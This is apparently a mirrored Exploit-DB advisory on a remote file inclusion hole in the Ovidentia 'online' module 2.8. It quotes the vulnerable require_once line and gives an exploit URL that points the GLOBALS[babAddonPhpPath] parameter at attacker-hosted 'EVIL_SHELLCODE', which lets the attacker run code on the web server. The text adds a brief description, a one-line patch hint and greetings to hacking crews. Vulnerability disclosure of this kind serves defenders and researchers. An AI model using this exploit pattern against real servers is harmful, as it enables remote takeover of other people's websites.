Ovidentia online Module 2.8 – ‘GLOBALS[babAddonPhpPath]’ Remote File Inclusion

  • 作者: bd0rk
    日期: 2015-12-21
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/39068/
  • # Title: Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability
    # Author: bd0rk
    # eMail: bd0rk[at]hackermail.com
    # Twitter: twitter.com/bd0rk
    # Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fonline&file=online-2-8.zip&idf=832
    /online-2-8/programs/admin.php line 2
    require_once( $GLOBALS['babAddonPhpPath']."functions.php");
    [+]Exploit: http://[target]/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=EVIL_SHELLCODE?
    Description: The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qequire_once.
     So it's possible to compromise the web-server about it.
     An attacker can inject s0me php-shellcode.
     I think, it's a big problem in this web-software!
    Patch: You can declare the vulnerable parameter or use an alert.
    ~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~